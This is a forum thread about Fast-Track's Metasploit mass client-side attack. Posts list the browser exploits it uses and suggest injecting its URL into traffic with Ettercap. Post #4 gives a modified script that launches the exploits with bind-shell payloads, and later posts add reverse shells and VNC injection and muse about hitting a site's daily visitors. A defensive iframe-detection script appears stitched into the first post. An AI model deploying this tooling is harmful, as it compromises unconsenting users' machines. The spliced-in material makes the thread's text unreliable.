Page 1 of 2
Results 1 to 10 of 16

Thread: Mass Client Side

  1. #1
    Good friend of the forums (Join Date: Feb 2010, Posts: 328)

    Mass Client Side

    Metasploit Mass Client-side Attack
    This is just a quick post about the script and how it works.
    It runs a bunch of Metasploit attacks at once and starts a local webserver that puts all the attacks in an iframe.

    *Update fast-track.py
    Go to the program menu > backtrack > penetration > fasttrack
    You can run the script directly from /pentest/fast-track/
    *Choose '2. External Hacking'
    *Choose '7. Metasploit Mass Client-Side Attack'


    Here is a list of the exploits it runs (the rc file is called metasploitloadfiles)

    windows/browser/ie_createobject
    osx/browser/software_update
    windows/browser/apple_quicktime_rtsp
    windows/browser/winamp_playlist_unc
    multi/browser/qtjava_pointer
    windows/browser/ibmlotusdomino_dwa_uploadmodule
    windows/browser/ani_loadimage_chunksize

    What you can do is combine this with a simple Ettercap filter to inject your URL at the end of, say, the body tag. Here is a sample post of an etterfilter.
    http://forums.remote-exploit.org/showthread.php?t=12885

    My next tutorial will be on replacing all HTTP GETs of EXEs with, say, a Metasploit payload ;P
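    From the defender's side, the layout described above (one hidden iframe per exploit listener, all on the same host but on different ports) is easy to spot in served HTML. The following is an added example, not code from the thread or from Fast-Track; the sample page and the 192.0.2.10 address are constructed for illustration.

```python
from collections import defaultdict
from html.parser import HTMLParser
from urllib.parse import urlparse

class IframeCollector(HTMLParser):
    """Collect the src of every <iframe> in an HTML document."""
    def __init__(self):
        super().__init__()
        self.srcs = []
    def handle_starttag(self, tag, attrs):
        if tag.lower() == "iframe":
            src = dict(attrs).get("src")
            if src:
                self.srcs.append(src.strip())

def iframe_ports_by_host(html):
    """Map each framed host to the set of TCP ports its iframes point at."""
    parser = IframeCollector()
    parser.feed(html)
    ports = defaultdict(set)
    for src in parser.srcs:
        url = urlparse(src)
        if url.scheme in ("http", "https") and url.hostname:
            ports[url.hostname].add(url.port or (443 if url.scheme == "https" else 80))
    return dict(ports)

def flag_port_fanout(html, min_ports=3):
    """Hosts that one page frames on >= min_ports distinct ports.
    A benign page rarely embeds a single origin on many ports; one host
    framed across 8000-8009 matches the mass client-side layout."""
    return sorted(host for host, p in iframe_ports_by_host(html).items()
                  if len(p) >= min_ports)

# Constructed sample page, mimicking the index.html described above
# (one iframe per exploit listener; 192.0.2.10 is a documentation address).
SAMPLE_PAGE = """<html><body><h1>Welcome</h1>
<iframe src="https://www.example.com/widget" width="300" height="80"></iframe>
<iframe src="http://192.0.2.10:8000/" width="1" height="1"></iframe>
<iframe src="http://192.0.2.10:8001/" width="1" height="1"></iframe>
<iframe src="http://192.0.2.10:8003/" width="1" height="1"></iframe>
<iframe src="http://192.0.2.10:8009/" width="1" height="1"></iframe>
</body></html>"""

if __name__ == "__main__":
    print(flag_port_fanout(SAMPLE_PAGE))  # ['192.0.2.10']
```

    The same check can be run over a proxy's cached responses; raising min_ports trades recall for fewer false positives on sites that legitimately embed a few non-standard ports.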

  2. #2
    Junior Member aggtrfrad (Join Date: Apr 2008, Posts: 74)

    Yeah, it's pretty cool, I got 3 shells on my unpatched XP SP2.
    Imagine this running on a small site with 500 visitors per day.
    It's still so easy to get a shell, many people never update...
    -Google is watching you

    -June 1, 2001, Microsoft CEO Steve Ballmer: "Linux is a cancer that attaches itself in an intellectual property sense to everything it touches."

  3. #3
    Just burned his ISO (Join Date: Jul 2007, Posts: 17)

    @operat0r:

    Is there a way to change the mass client side payload from shell to meterpreter?

  4. #4
    Senior Member BigMac (Join Date: Jan 2008, Posts: 213)

    Yes, you can... you have to change a few things around in the source... here is how I did it...

    Open metaclient.py and replace it with this code... you can find the file in this directory: /pentest/fast-track/bin/ftsrc
    Code:
    import pexpect,sys,os
    try:
        import psyco
        psyco.full()
    except ImportError:
        pass
    # Start mass client attack
    # definepath (the Fast-Track root) must exist before the config file below is
    # read; the original ordering only defined it after the first use
    definepath=os.getcwd()
    try:
        import re
        # the last line of metasploitconfig.file holds the Metasploit path
        metapath=file("%s/bin/setup/metasploitconfig.file" % (definepath)).readlines()
        for line in metapath:
            metapath=line.rstrip()
    except Exception:
        print "Metasploit path not defined, you should run setup.py,\nusing the default for now..."
        metapath="/pentest/exploits/framework3/"
    try:
        #define IP Addr to echo into index.html
        ipaddr=sys.argv[3]
        print "Setting up Metasploit MSFConsole with various exploits..."
        # the resource script is no longer generated here: edit the existing
        # metasploitloadfile by hand (see below); the original contents are kept
        # as a reference
        #prepfile=file("metasploitloadfile","w")
        #prepfile.write("use exploit/windows/browser/ie_createobject\nset PAYLOAD generic/shell_bind_tcp\nset SRVPORT 8001\nset URIPATH /\nexploit\nuse exploit/osx/browser/software_update\nset PAYLOAD generic/shell_bind_tcp\nset SRVPORT 8002\nset URIPATH /\nexploit\nuse exploit/windows/browser/apple_quicktime_rtsp\nset PAYLOAD generic/shell_bind_tcp\nset SRVPORT 8003\nset URIPATH /\nexploit\nuse exploit/windows/browser/winamp_playlist_unc\nset PAYLOAD generic/shell_bind_tcp\nset SRVPORT 8007\nset URIPATH /\nexploit\nuse exploit/multi/browser/qtjava_pointer\nset PAYLOAD generic/shell_bind_tcp\nset SRVPORT 8005\nset URIPATH /\nset TARGET 0\nexploit\nuse exploit/multi/browser/qtjava_pointer\nset PAYLOAD generic/shell_bind_tcp\nset SRVPORT 8006\nset URIPATH /\nset TARGET 1\nexploit\nuse exploit/multi/browser/qtjava_pointer\nset PAYLOAD generic/shell_bind_tcp\nset SRVPORT 8008\nset URIPATH /\nset TARGET 2\nexploit\nuse exploit/windows/browser/ibmlotusdomino_dwa_uploadmodule\nset PAYLOAD generic/shell_bind_tcp\nset SRVPORT 8009\nset URIPATH /\nexploit\nuse exploit/windows/browser/ani_loadimage_chunksize\nset PAYLOAD generic/shell_bind_tcp\nset SRVPORT 8000\nset URIPATH /\nexploit\n")
        #prepfile.close()
        print "If an exploit succeeds, type sessions -l to list shells and sessions -i <id>\nto interact...\n\n"
        print "Have someone connect to you on port 80...\n"
        print "Launching MSFConsole and Exploits...\n"
        print "Once you see the Metasploit Console launch all the exploits have someone\nconnect to you.."
        # msfconsole loads the (edited) resource script; the custom HTTP server
        # serves the index.html whose iframes point at each SRVPORT
        launchsploit=os.popen2("""xterm -geometry 100x300x450x500 -T "Fast-Track Metasploit Mass Client Attack" -e "%smsfconsole -r %s/metasploitloadfile" 2> /dev/null""" % (metapath,definepath))
        launchhttpserver=os.popen2("""xterm -geometry 100x50 -T "Fast-Track Metasploit Custom HTTP Server" -e "python %s/bin/ftsrc/metahttpserver.py %s" 2> /dev/null""" % (definepath,ipaddr))
        pause=raw_input("Press enter to end the Mass Client Attack...")
    except KeyboardInterrupt:
        print "\n\nExiting Metasploit Mass Client Attack...\n\n"
        # 'del' is a Windows command, so on BackTrack this cleanup does nothing,
        # which also keeps the hand-edited metasploitloadfile from being removed
        delfile=os.popen3("del metasploitloadfile")
    except Exception:
        print "\n\nExiting Metasploit Mass Client Attack...\n\n"
        delfile=os.popen3("del metasploitloadfile")
    Now you need to open the metasploitloadfile located here: /pentest/fast-track.... Make your changes and save the file.

    If you know how to use the metasploit console then the rest is up to you

  5. #5
    Junior Member SBerry (Join Date: Dec 2007, Posts: 94)

    I have used the mass client side attack to pwn Internet Explorer many times. When I try to exploit Firefox it says that in order to exploit the browser you must set the SRVPORT to 80 and URI to /.
    I tried changing the SRVPORT for the exploit in metaclient.py.

    Is this the correct procedure, and has anyone got this working?

  6. #6

    Is there any benefit to running this over the browser autopwn script itself?

  7. #7
    Member (Join Date: Feb 2006, Posts: 167)

    changes

    I'll make some changes later to specify if you want a meterpreter shell, shell bind etc. in the next release. Good find; it would be cool to add the option to menu/command line/webgui.

  8. #8
    Member (Join Date: Feb 2006, Posts: 167)

    hahaha

    Alright, TWO hours later it's done :P

    I'll update Fast-Track tomorrow with some bug fixes and a new addition to the metasploit mass client attack....

    You can now specify the payloads you want. I added four so far; if you guys have any other requests let me know. Right now you can specify them in all modes (interactive, command line, and web GUI):

    1. Meterpreter Reverse TCP
    2. Reverse TCP Shell
    3. Meterpreter VNC Reverse Inject
    4. Generic Bind Shell

    I tested all of them, it was pretty sweeeeet to see a reverse vnc GUI through mass client attack!!!

    I'll update tomorrow.

    Thanks for the ideas.

    ReL

  9. #9
    Member hawaii67 (Join Date: Feb 2006, Posts: 318)

    Fast-Track updated.
    Already played around with it. Great work relik, like always...
    Thanks.
    Don't eat yellow snow :rolleyes:
